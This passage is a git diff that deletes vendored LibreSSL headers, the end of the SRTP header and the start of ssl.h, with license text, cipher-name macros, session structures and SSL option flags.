- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-/* ====================================================================
- * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-/*
- * DTLS code by Eric Rescorla <ekr@rtfm.com>
- *
- * Copyright (C) 2006, Network Resonance, Inc.
- * Copyright (C) 2011, RTFM, Inc.
- */
-
-#ifndef HEADER_D1_SRTP_H
-#define HEADER_D1_SRTP_H
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#define SRTP_AES128_CM_SHA1_80 0x0001
-#define SRTP_AES128_CM_SHA1_32 0x0002
-#define SRTP_AES128_F8_SHA1_80 0x0003
-#define SRTP_AES128_F8_SHA1_32 0x0004
-#define SRTP_NULL_SHA1_80      0x0005
-#define SRTP_NULL_SHA1_32      0x0006
-
-int SSL_CTX_set_tlsext_use_srtp(SSL_CTX *ctx, const char *profiles);
-int SSL_set_tlsext_use_srtp(SSL *ctx, const char *profiles);
-
-STACK_OF(SRTP_PROTECTION_PROFILE) *SSL_get_srtp_profiles(SSL *ssl);
-SRTP_PROTECTION_PROFILE *SSL_get_selected_srtp_profile(SSL *s);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/ssl.h b/thirdparty/libressl/include/openssl/ssl.h
deleted file mode 100644
index d431b17..0000000
--- a/thirdparty/libressl/include/openssl/ssl.h
+++ /dev/null
@@ -1,2067 +0,0 @@
-/* $OpenBSD: ssl.h,v 1.134 2017/08/30 16:24:21 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-/* ====================================================================
- * Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-/* ====================================================================
- * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
- * ECC cipher suite support in OpenSSL originally developed by
- * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
- */
-/* ====================================================================
- * Copyright 2005 Nokia. All rights reserved.
- *
- * The portions of the attached software ("Contribution") is developed by
- * Nokia Corporation and is licensed pursuant to the OpenSSL open source
- * license.
- *
- * The Contribution, originally written by Mika Kousa and Pasi Eronen of
- * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
- * support (see RFC 4279) to OpenSSL.
- *
- * No patent licenses or other rights except those expressly stated in
- * the OpenSSL open source license shall be deemed granted or received
- * expressly, by implication, estoppel, or otherwise.
- *
- * No assurances are provided by Nokia that the Contribution does not
- * infringe the patent or other intellectual property rights of any third
- * party or that the license provides you with all the necessary rights
- * to make use of the Contribution.
- *
- * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
- * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
- * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
- * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
- * OTHERWISE.
- */
-
-#ifndef HEADER_SSL_H
-#define HEADER_SSL_H
-
-#include <stdint.h>
-
-#include <openssl/opensslconf.h>
-#include <openssl/hmac.h>
-#include <openssl/pem.h>
-#include <openssl/safestack.h>
-
-#include <openssl/bio.h>
-
-#ifndef OPENSSL_NO_DEPRECATED
-#include <openssl/buffer.h>
-#include <openssl/crypto.h>
-#include <openssl/lhash.h>
-
-#ifndef OPENSSL_NO_X509
-#include <openssl/x509.h>
-#endif
-#endif
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* SSLeay version number for ASN.1 encoding of the session information */
-/* Version 0 - initial version
- * Version 1 - added the optional peer certificate
- */
-#define SSL_SESSION_ASN1_VERSION 0x0001
-
-/* text strings for the ciphers */
-#define SSL_TXT_NULL_WITH_MD5		SSL2_TXT_NULL_WITH_MD5
-#define SSL_TXT_RC4_128_WITH_MD5	SSL2_TXT_RC4_128_WITH_MD5
-#define SSL_TXT_RC4_128_EXPORT40_WITH_MD5 SSL2_TXT_RC4_128_EXPORT40_WITH_MD5
-#define SSL_TXT_RC2_128_CBC_WITH_MD5	SSL2_TXT_RC2_128_CBC_WITH_MD5
-#define SSL_TXT_RC2_128_CBC_EXPORT40_WITH_MD5 SSL2_TXT_RC2_128_CBC_EXPORT40_WITH_MD5
-#define SSL_TXT_IDEA_128_CBC_WITH_MD5	SSL2_TXT_IDEA_128_CBC_WITH_MD5
-#define SSL_TXT_DES_64_CBC_WITH_MD5	SSL2_TXT_DES_64_CBC_WITH_MD5
-#define SSL_TXT_DES_64_CBC_WITH_SHA	SSL2_TXT_DES_64_CBC_WITH_SHA
-#define SSL_TXT_DES_192_EDE3_CBC_WITH_MD5 SSL2_TXT_DES_192_EDE3_CBC_WITH_MD5
-#define SSL_TXT_DES_192_EDE3_CBC_WITH_SHA SSL2_TXT_DES_192_EDE3_CBC_WITH_SHA
-
-/*    VRS Additional Kerberos5 entries
- */
-#define SSL_TXT_KRB5_DES_64_CBC_SHA   SSL3_TXT_KRB5_DES_64_CBC_SHA
-#define SSL_TXT_KRB5_DES_192_CBC3_SHA SSL3_TXT_KRB5_DES_192_CBC3_SHA
-#define SSL_TXT_KRB5_RC4_128_SHA      SSL3_TXT_KRB5_RC4_128_SHA
-#define SSL_TXT_KRB5_IDEA_128_CBC_SHA SSL3_TXT_KRB5_IDEA_128_CBC_SHA
-#define SSL_TXT_KRB5_DES_64_CBC_MD5   SSL3_TXT_KRB5_DES_64_CBC_MD5
-#define SSL_TXT_KRB5_DES_192_CBC3_MD5 SSL3_TXT_KRB5_DES_192_CBC3_MD5
-#define SSL_TXT_KRB5_RC4_128_MD5      SSL3_TXT_KRB5_RC4_128_MD5
-#define SSL_TXT_KRB5_IDEA_128_CBC_MD5 SSL3_TXT_KRB5_IDEA_128_CBC_MD5
-
-#define SSL_TXT_KRB5_DES_40_CBC_SHA   SSL3_TXT_KRB5_DES_40_CBC_SHA
-#define SSL_TXT_KRB5_RC2_40_CBC_SHA   SSL3_TXT_KRB5_RC2_40_CBC_SHA
-#define SSL_TXT_KRB5_RC4_40_SHA	      SSL3_TXT_KRB5_RC4_40_SHA
-#define SSL_TXT_KRB5_DES_40_CBC_MD5   SSL3_TXT_KRB5_DES_40_CBC_MD5
-#define SSL_TXT_KRB5_RC2_40_CBC_MD5   SSL3_TXT_KRB5_RC2_40_CBC_MD5
-#define SSL_TXT_KRB5_RC4_40_MD5	      SSL3_TXT_KRB5_RC4_40_MD5
-
-#define SSL_TXT_KRB5_DES_40_CBC_SHA   SSL3_TXT_KRB5_DES_40_CBC_SHA
-#define SSL_TXT_KRB5_DES_40_CBC_MD5   SSL3_TXT_KRB5_DES_40_CBC_MD5
-#define SSL_TXT_KRB5_DES_64_CBC_SHA   SSL3_TXT_KRB5_DES_64_CBC_SHA
-#define SSL_TXT_KRB5_DES_64_CBC_MD5   SSL3_TXT_KRB5_DES_64_CBC_MD5
-#define SSL_TXT_KRB5_DES_192_CBC3_SHA SSL3_TXT_KRB5_DES_192_CBC3_SHA
-#define SSL_TXT_KRB5_DES_192_CBC3_MD5 SSL3_TXT_KRB5_DES_192_CBC3_MD5
-#define SSL_MAX_KRB5_PRINCIPAL_LENGTH  256
-
-#define SSL_MAX_SSL_SESSION_ID_LENGTH		32
-#define SSL_MAX_SID_CTX_LENGTH			32
-
-#define SSL_MIN_RSA_MODULUS_LENGTH_IN_BYTES	(512/8)
-#define SSL_MAX_KEY_ARG_LENGTH			8
-#define SSL_MAX_MASTER_KEY_LENGTH		48
-
-
-/* These are used to specify which ciphers to use and not to use */
-
-#define SSL_TXT_LOW		"LOW"
-#define SSL_TXT_MEDIUM		"MEDIUM"
-#define SSL_TXT_HIGH		"HIGH"
-
-#define SSL_TXT_kFZA		"kFZA" /* unused! */
-#define	SSL_TXT_aFZA		"aFZA" /* unused! */
-#define SSL_TXT_eFZA		"eFZA" /* unused! */
-#define SSL_TXT_FZA		"FZA"  /* unused! */
-
-#define	SSL_TXT_aNULL		"aNULL"
-#define	SSL_TXT_eNULL		"eNULL"
-#define	SSL_TXT_NULL		"NULL"
-
-#define SSL_TXT_kRSA		"kRSA"
-#define SSL_TXT_kDHr		"kDHr" /* no such ciphersuites supported! */
-#define SSL_TXT_kDHd		"kDHd" /* no such ciphersuites supported! */
-#define SSL_TXT_kDH 		"kDH"  /* no such ciphersuites supported! */
-#define SSL_TXT_kEDH		"kEDH"
-#define SSL_TXT_kKRB5     	"kKRB5"
-#define SSL_TXT_kECDHr		"kECDHr"
-#define SSL_TXT_kECDHe		"kECDHe"
-#define SSL_TXT_kECDH		"kECDH"
-#define SSL_TXT_kEECDH		"kEECDH"
-#define SSL_TXT_kPSK            "kPSK"
-#define SSL_TXT_kGOST		"kGOST"
-#define SSL_TXT_kSRP		"kSRP"
-
-#define	SSL_TXT_aRSA		"aRSA"
-#define	SSL_TXT_aDSS		"aDSS"
-#define	SSL_TXT_aDH		"aDH" /* no such ciphersuites supported! */
-#define	SSL_TXT_aECDH		"aECDH"
-#define SSL_TXT_aKRB5     	"aKRB5"
-#define SSL_TXT_aECDSA		"aECDSA"
-#define SSL_TXT_aPSK            "aPSK"
-#define SSL_TXT_aGOST94		"aGOST94"
-#define SSL_TXT_aGOST01		"aGOST01"
-#define SSL_TXT_aGOST		"aGOST"
-
-#define	SSL_TXT_DSS		"DSS"
-#define SSL_TXT_DH		"DH"
-#define SSL_TXT_DHE		"DHE" /* same as "kDHE:-ADH" */
-#define SSL_TXT_EDH		"EDH" /* previous name for DHE */
-#define SSL_TXT_ADH		"ADH"
-#define SSL_TXT_RSA		"RSA"
-#define SSL_TXT_ECDH		"ECDH"
-#define SSL_TXT_ECDHE		"ECDHE" /* same as "kECDHE:-AECDH" */
-#define SSL_TXT_EECDH		"EECDH" /* previous name for ECDHE */
-#define SSL_TXT_AECDH		"AECDH"
-#define SSL_TXT_ECDSA		"ECDSA"
-#define SSL_TXT_KRB5      	"KRB5"
-#define SSL_TXT_PSK             "PSK"
-#define SSL_TXT_SRP		"SRP"
-
-#define SSL_TXT_DES		"DES"
-#define SSL_TXT_3DES		"3DES"
-#define SSL_TXT_RC4		"RC4"
-#define SSL_TXT_RC2		"RC2"
-#define SSL_TXT_IDEA		"IDEA"
-#define SSL_TXT_SEED		"SEED"
-#define SSL_TXT_AES128		"AES128"
-#define SSL_TXT_AES256		"AES256"
-#define SSL_TXT_AES		"AES"
-#define SSL_TXT_AES_GCM		"AESGCM"
-#define SSL_TXT_CAMELLIA128	"CAMELLIA128"
-#define SSL_TXT_CAMELLIA256	"CAMELLIA256"
-#define SSL_TXT_CAMELLIA	"CAMELLIA"
-#define SSL_TXT_CHACHA20	"CHACHA20"
-
-#define SSL_TXT_AEAD		"AEAD"
-#define SSL_TXT_MD5		"MD5"
-#define SSL_TXT_SHA1		"SHA1"
-#define SSL_TXT_SHA		"SHA" /* same as "SHA1" */
-#define SSL_TXT_GOST94		"GOST94"
-#define SSL_TXT_GOST89MAC		"GOST89MAC"
-#define SSL_TXT_SHA256		"SHA256"
-#define SSL_TXT_SHA384		"SHA384"
-#define SSL_TXT_STREEBOG256		"STREEBOG256"
-#define SSL_TXT_STREEBOG512		"STREEBOG512"
-
-#define SSL_TXT_DTLS1		"DTLSv1"
-#define SSL_TXT_SSLV2		"SSLv2"
-#define SSL_TXT_SSLV3		"SSLv3"
-#define SSL_TXT_TLSV1		"TLSv1"
-#define SSL_TXT_TLSV1_1		"TLSv1.1"
-#define SSL_TXT_TLSV1_2		"TLSv1.2"
-
-#define SSL_TXT_EXP		"EXP"
-#define SSL_TXT_EXPORT		"EXPORT"
-
-#define SSL_TXT_ALL		"ALL"
-
-/*
- * COMPLEMENTOF* definitions. These identifiers are used to (de-select)
- * ciphers normally not being used.
- * Example: "RC4" will activate all ciphers using RC4 including ciphers
- * without authentication, which would normally disabled by DEFAULT (due
- * the "!ADH" being part of default). Therefore "RC4:!COMPLEMENTOFDEFAULT"
- * will make sure that it is also disabled in the specific selection.
- * COMPLEMENTOF* identifiers are portable between version, as adjustments
- * to the default cipher setup will also be included here.
- *
- * COMPLEMENTOFDEFAULT does not experience the same special treatment that
- * DEFAULT gets, as only selection is being done and no sorting as needed
- * for DEFAULT.
- */
-#define SSL_TXT_CMPALL		"COMPLEMENTOFALL"
-#define SSL_TXT_CMPDEF		"COMPLEMENTOFDEFAULT"
-
-/* The following cipher list is used by default.
- * It also is substituted when an application-defined cipher list string
- * starts with 'DEFAULT'. */
-#define SSL_DEFAULT_CIPHER_LIST	"ALL:!aNULL:!eNULL:!SSLv2"
-/* As of OpenSSL 1.0.0, ssl_create_cipher_list() in ssl/ssl_ciph.c always
- * starts with a reasonable order, and all we have to do for DEFAULT is
- * throwing out anonymous and unencrypted ciphersuites!
- * (The latter are not actually enabled by ALL, but "ALL:RSA" would enable
- * some of them.)
- */
-
-/* Used in SSL_set_shutdown()/SSL_get_shutdown(); */
-#define SSL_SENT_SHUTDOWN	1
-#define SSL_RECEIVED_SHUTDOWN	2
-
-
-#define SSL_FILETYPE_ASN1	X509_FILETYPE_ASN1
-#define SSL_FILETYPE_PEM	X509_FILETYPE_PEM
-
-/* This is needed to stop compilers complaining about the
- * 'struct ssl_st *' function parameters used to prototype callbacks
- * in SSL_CTX. */
-typedef struct ssl_st *ssl_crock_st;
-
-typedef struct tls_session_ticket_ext_st TLS_SESSION_TICKET_EXT;
-typedef struct ssl_method_st SSL_METHOD;
-typedef struct ssl_cipher_st SSL_CIPHER;
-typedef struct ssl_session_st SSL_SESSION;
-
-DECLARE_STACK_OF(SSL_CIPHER)
-
-/* SRTP protection profiles for use with the use_srtp extension (RFC 5764)*/
-typedef struct srtp_protection_profile_st {
-	const char *name;
-	unsigned long id;
-} SRTP_PROTECTION_PROFILE;
-
-DECLARE_STACK_OF(SRTP_PROTECTION_PROFILE)
-
-typedef int (*tls_session_ticket_ext_cb_fn)(SSL *s, const unsigned char *data,
-    int len, void *arg);
-typedef int (*tls_session_secret_cb_fn)(SSL *s, void *secret, int *secret_len,
-    STACK_OF(SSL_CIPHER) *peer_ciphers, SSL_CIPHER **cipher, void *arg);
-
-#ifndef OPENSSL_NO_SSL_INTERN
-
-/* used to hold info on the particular ciphers used */
-struct ssl_cipher_st {
-	int valid;
-	const char *name;		/* text name */
-	unsigned long id;		/* id, 4 bytes, first is version */
-
-	unsigned long algorithm_mkey;	/* key exchange algorithm */
-	unsigned long algorithm_auth;	/* server authentication */
-	unsigned long algorithm_enc;	/* symmetric encryption */
-	unsigned long algorithm_mac;	/* symmetric authentication */
-	unsigned long algorithm_ssl;	/* (major) protocol version */
-
-	unsigned long algo_strength;	/* strength and export flags */
-	unsigned long algorithm2;	/* Extra flags */
-	int strength_bits;		/* Number of bits really used */
-	int alg_bits;			/* Number of bits for algorithm */
-};
-
-
-/* Used to hold functions for SSLv3/TLSv1 functions */
-struct ssl_method_internal_st;
-
-struct ssl_method_st {
-	int (*ssl_dispatch_alert)(SSL *s);
-	int (*num_ciphers)(void);
-	const SSL_CIPHER *(*get_cipher)(unsigned ncipher);
-	const SSL_CIPHER *(*get_cipher_by_char)(const unsigned char *ptr);
-	int (*put_cipher_by_char)(const SSL_CIPHER *cipher, unsigned char *ptr);
-
-	const struct ssl_method_internal_st *internal;
-};
-
-/* Lets make this into an ASN.1 type structure as follows
- * SSL_SESSION_ID ::= SEQUENCE {
- *	version 		INTEGER,	-- structure version number
- *	SSLversion 		INTEGER,	-- SSL version number
- *	Cipher 			OCTET STRING,	-- the 3 byte cipher ID
- *	Session_ID 		OCTET STRING,	-- the Session ID
- *	Master_key 		OCTET STRING,	-- the master key
- *	KRB5_principal		OCTET STRING	-- optional Kerberos principal
- *	Time [ 1 ] EXPLICIT	INTEGER,	-- optional Start Time
- *	Timeout [ 2 ] EXPLICIT	INTEGER,	-- optional Timeout ins seconds
- *	Peer [ 3 ] EXPLICIT	X509,		-- optional Peer Certificate
- *	Session_ID_context [ 4 ] EXPLICIT OCTET STRING,   -- the Session ID context
- *	Verify_result [ 5 ] EXPLICIT INTEGER,   -- X509_V_... code for `Peer'
- *	HostName [ 6 ] EXPLICIT OCTET STRING,   -- optional HostName from servername TLS extension
- *	PSK_identity_hint [ 7 ] EXPLICIT OCTET STRING, -- optional PSK identity hint
- *	PSK_identity [ 8 ] EXPLICIT OCTET STRING,  -- optional PSK identity
- *	Ticket_lifetime_hint [9] EXPLICIT INTEGER, -- server's lifetime hint for session ticket
- *	Ticket [10]             EXPLICIT OCTET STRING, -- session ticket (clients only)
- *	Compression_meth [11]   EXPLICIT OCTET STRING, -- optional compression method
- *	SRP_username [ 12 ] EXPLICIT OCTET STRING -- optional SRP username
- *	}
- * Look in ssl/ssl_asn1.c for more details
- * I'm using EXPLICIT tags so I can read the damn things using asn1parse :-).
- */
-struct ssl_session_internal_st;
-
-struct ssl_session_st {
-	int ssl_version;	/* what ssl version session info is
-				 * being kept in here? */
-
-	int master_key_length;
-	unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH];
-
-	/* session_id - valid? */
-	unsigned int session_id_length;
-	unsigned char session_id[SSL_MAX_SSL_SESSION_ID_LENGTH];
-
-	/* this is used to determine whether the session is being reused in
-	 * the appropriate context. It is up to the application to set this,
-	 * via SSL_new */
-	unsigned int sid_ctx_length;
-	unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH];
-
-	/* This is the cert for the other end. */
-	X509 *peer;
-
-	/* when app_verify_callback accepts a session where the peer's certificate
-	 * is not ok, we must remember the error for session reuse: */
-	long verify_result; /* only for servers */
-
-	long timeout;
-	time_t time;
-	int references;
-
-	const SSL_CIPHER *cipher;
-	unsigned long cipher_id;	/* when ASN.1 loaded, this
-					 * needs to be used to load
-					 * the 'cipher' structure */
-
-	STACK_OF(SSL_CIPHER) *ciphers; /* shared ciphers? */
-
-	char *tlsext_hostname;
-
-	/* RFC4507 info */
-	unsigned char *tlsext_tick;	/* Session ticket */
-	size_t tlsext_ticklen;		/* Session ticket length */
-	long tlsext_tick_lifetime_hint;	/* Session lifetime hint in seconds */
-
-	struct ssl_session_internal_st *internal;
-};
-
-#endif
-
-/* Allow initial connection to servers that don't support RI */
-#define SSL_OP_LEGACY_SERVER_CONNECT			0x00000004L
-
-/* Disable SSL 3.0/TLS 1.0 CBC vulnerability workaround that was added
- * in OpenSSL 0.9.6d.  Usually (depending on the application protocol)
- * the workaround is not needed.
- * Unfortunately some broken SSL/TLS implementations cannot handle it
- * at all, which is why it was previously included in SSL_OP_ALL.
- * Now it's not.
- */
-#define SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS		0x00000800L
-
-/* DTLS options */
-#define SSL_OP_NO_QUERY_MTU				0x00001000L
-/* Turn on Cookie Exchange (on relevant for servers) */
-#define SSL_OP_COOKIE_EXCHANGE				0x00002000L
-/* Don't use RFC4507 ticket extension */
-#define SSL_OP_NO_TICKET				0x00004000L
-
-/* As server, disallow session resumption on renegotiation */
-#define SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION	0x00010000L
-/* Disallow client initiated renegotiation. */
-#define SSL_OP_NO_CLIENT_RENEGOTIATION			0x00020000L
-/* If set, always create a new key when using tmp_dh parameters */
-#define SSL_OP_SINGLE_DH_USE				0x00100000L
-/* Set on servers to choose the cipher according to the server's
- * preferences */
-#define SSL_OP_CIPHER_SERVER_PREFERENCE			0x00400000L
-/* If set, a server will allow a client to issue a SSLv3.0 version number
- * as latest version supported in the premaster secret, even when TLSv1.0
- * (version 3.1) was announced in the client hello. Normally this is
- * forbidden to prevent version rollback attacks. */
-#define SSL_OP_TLS_ROLLBACK_BUG				0x00800000L
-
-#define SSL_OP_NO_TLSv1					0x04000000L
-#define SSL_OP_NO_TLSv1_2				0x08000000L
-#define SSL_OP_NO_TLSv1_1				0x10000000L
-
-/* SSL_OP_ALL: various bug workarounds that should be rather harmless. */
-#define SSL_OP_ALL \
-    (SSL_OP_LEGACY_SERVER_CONNECT)
-
-/* Obsolete flags kept for compatibility. No sane code should use them. */
-#define SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION	0x0
-#define SSL_OP_CISCO_ANYCONNECT				0x0
-#define SSL_OP_CRYPTOPRO_TLSEXT_BUG			0x0
-#define SSL_OP_EPHEMERAL_RSA				0x0
-#define SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER		0x0
-#define SSL_OP_MICROSOFT_SESS_ID_BUG			0x0
-#define SSL_OP_MSIE_SSLV2_RSA_PADDING			0x0
-#define SSL_OP_NETSCAPE_CA_DN_BUG			0x0
-#define SSL_OP_NETSCAPE_CHALLENGE_BUG			0x0
-#define SSL_OP_NETSCAPE_DEMO_CIPHER_CHANGE_BUG		0x0
-#define SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG		0x0
-#define SSL_OP_NO_COMPRESSION				0x0
-#define SSL_OP_NO_SSLv2					0x0
-#define SSL_OP_NO_SSLv3					0x0
-#define SSL_OP_PKCS1_CHECK_1				0x0
-#define SSL_OP_PKCS1_CHECK_2				0x0
-#define SSL_OP_SAFARI_ECDHE_ECDSA_BUG			0x0
-#define SSL_OP_SINGLE_ECDH_USE				0x0
-#define SSL_OP_SSLEAY_080_CLIENT_DH_BUG			0x0
-#define SSL_OP_SSLREF2_REUSE_CERT_TYPE_BUG		0x0
-#define SSL_OP_TLSEXT_PADDING				0x0
-#define SSL_OP_TLS_BLOCK_PADDING_BUG			0x0
-#define SSL_OP_TLS_D5_BUG				0x0
-
-/* Allow SSL_write(..., n) to return r with 0 < r < n (i.e. report success
- * when just a single record has been written): */
-#define SSL_MODE_ENABLE_PARTIAL_WRITE       0x00000001L
-/* Make it possible to retry SSL_write() with changed buffer location
- * (buffer contents must stay the same!); this is not the default to avoid
- * the misconception that non-blocking SSL_write() behaves like
- * non-blocking write(): */
-#define SSL_MODE_ACCEPT_MOVING_WRITE_BUFFER 0x00000002L
-/* Never bother the application with retries if the transport
- * is blocking: */
-#define SSL_MODE_AUTO_RETRY 0x00000004L
-/* Don't attempt to automatically build certificate chain */
-#define SSL_MODE_NO_AUTO_CHAIN 0x00000008L
